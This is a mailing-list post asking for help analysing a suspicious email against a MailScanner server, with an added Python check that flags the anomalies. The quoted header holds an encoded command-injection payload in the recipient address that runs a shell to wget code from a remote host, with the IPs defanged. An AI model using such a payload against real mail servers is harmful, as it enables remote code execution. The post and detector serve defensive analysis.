possible attack against MailScanner ?

Heino Backhaus heino.backhaus at fink-computer.de
Mon Jul 15 10:58:55 UTC 2019


Hello List,

I need some help analysing the following email, which I received last week.

Mailwatch Mail-Metadata:

Received: from sab.com (unknown [46.22.132.94])
     by mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD
     for
<root+${run{x2fbinx2fsht-ctx22wgetx20*1.2.3.4*x2fsbzx2f*5.6.7.8*x22}}@mailscanner.mydomain.local>;
Thu, 11 Jul 2019 19:34:58 +0200 (CEST)
Received: 1
Received: 2
Received: 3
Received: 4
Received: 5
Received: 6
Received: 7
Received: 8
Received: 9
Received: 10
Received: 11
Received: 12
Received: 13
Received: 14
Received: 15
Received: 16
Received: 17
Received: 18
Received: 19
Received: 20
Received: 21
Received: 22
Received: 23
Received: 24
Received: 25
Received: 26
Received: 27
Received: 28
Received: 29
Received: 30
Received: 31



IP1: *199.204.214.40* changed to *1.2.3.4* to disarm this...just in case...
IP2: *87.138.227.107* changed to *5.6.7.8* to disarm this...just in case...

Versions:
MailWatch Version: 1.2.9
OS: Ubuntu 16.04.6 LTS (Xenial Xerus)
Postfix Version: 3.1.0
MailScanner Version: 5.1.2
ClamAV Version: 0.102.0-devel-20190715
SpamAssassin Version: 3.4.2
PHP Version: 5.6.40-8+ubuntu16.04.1+deb.sury.org+1
MySQL Version: 5.7.26-0ubuntu0.16.04.1

Can you help me bring some light into this darkness...

-- 
Kind regards

H. Backhaus 

Fink-Computer Systeme
Heggrabenstr. 9, 35435 Wettenberg
Email: heino.backhaus at fink-computer.de
Web: www.fink-computer.de
Fax: +49-641-98444638
Fon: +49-641-98444640
UST-ID: DE151040770
HRB: 2143 Gießen
GF: Fredi Fink

I was gratified to be able to answer promptly, and I did.
I said I didn't know.
 Mark Twain


--
This message has been scanned for viruses and other dangerous content
and is, assuming up-to-date virus scanners, clean.
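
Added example, not part of the original post: a Python check a mail administrator could run over raw headers to flag the two anomalies visible in the quoted metadata, a `${run{...}}` expression inside the recipient address and numbered filler `Received:` lines. The function name `analyse`, the `MAX_RECEIVED` threshold and the sample message are assumptions made for this sketch.

```python
import re
from email import message_from_string

MAX_RECEIVED = 30  # assumed alert threshold for hop count; tune per site

# "${name{" has the shape of an Exim-style string expansion such as ${run{...}}
EXPANSION = re.compile(r"\$\{\s*([a-z_]+)\s*\{", re.I)
ADDR = re.compile(r"<([^<>]*)>")                 # anything in angle brackets
TRACE = re.compile(r"\b(?:from|by)\s+\S", re.I)  # a real hop names a host

# Constructed sample modelled on the quoted headers; the expansion body is
# shortened and the 31 numbered lines are generated.
SAMPLE = (
    "Received: from sab.com (unknown [46.22.132.94])\n"
    "\tby mailscanner.mydomain.local (Postfix) with SMTP id D3F551005AD\n"
    "\tfor <root+${run{x2fbinx2fsh}}@mailscanner.mydomain.local>;\n"
    "\tThu, 11 Jul 2019 19:34:58 +0200 (CEST)\n"
    + "".join(f"Received: {n}\n" for n in range(1, 32))
    + "Subject: constructed sample\n\nbody\n"
)


def analyse(raw):
    """Return (finding, detail) tuples for suspicious trace headers."""
    received = message_from_string(raw).get_all("Received") or []
    findings = []
    for value in received:
        flat = " ".join(value.split())  # unfold continuation lines
        for addr in ADDR.findall(flat):
            match = EXPANSION.search(addr)
            if match:
                findings.append(("expansion-in-address", match.group(1)))
    filler = sum(1 for value in received if not TRACE.search(value))
    if filler:
        findings.append(("filler-received", filler))
    if len(received) > MAX_RECEIVED:
        findings.append(("received-count", len(received)))
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE):
        print(finding)
```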

